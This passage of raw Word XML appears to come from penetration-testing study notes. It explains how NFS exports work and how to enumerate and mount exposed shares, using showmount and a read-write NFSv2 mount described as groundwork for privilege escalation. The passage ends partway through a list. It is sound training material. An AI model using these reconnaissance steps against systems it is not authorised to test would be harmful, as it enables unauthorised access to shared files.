          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is closely related to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RPC (Remote Procedure Call)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> because NFS relies on RPC to function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F52">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How NFS Works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A server exports directories or file systems, specifying which clients can access them and with what permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exported directories are defined in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exports</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file (e.g., </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/exports</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Client-Side Access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Clients can mount the shared directories over the network using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After mounting, files and directories in the shared directory appear as if they are part of the client's local file system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F59">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Enumerate NFS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">showmount -e [ip_address]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">showmount: A Linux command that queries an NFS server to retrieve information about its exports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e: This flag stands for "exports." It tells showmount to display the exported directories along with the client permission</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exported Directories: Directories or file systems that the NFS server is sharing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allowed Clients: Specifies which systems or IPs are allowed to access those directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2466975" cy="866775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="42" name="image53.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image53.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1041"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2466975" cy="866775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see two globally accessible file-shares, as indicated by the star. We can have a look at their contents by mounting the directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo mount -t nfs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[path_to_file] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if we want </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html (as shown in screenshot):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo mount -t nfs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IP]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If /mnt/1 doesn't exist, use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo mkdir -p /mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensures that any parent directories (like /mnt) exist. This is helpful if you're not sure whether /mnt exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount: The Linux command to attach (mount) a file system to the local file system hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t nfs: Specifies the type of file system to mount, in this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace /var/www/html with the the directory on the NFS server that is being exported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to mount NFS is as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount -o rw,vers=2 &lt;target&gt;:&lt;share&gt; &lt;local_directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Linux NFS Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in the NFS Priv Esc example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This would connect using NFSv2 in read/write mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The other one would try NFSv4 or v3 in default mode, which might fail if the server only supports v2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Read the filenames and permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
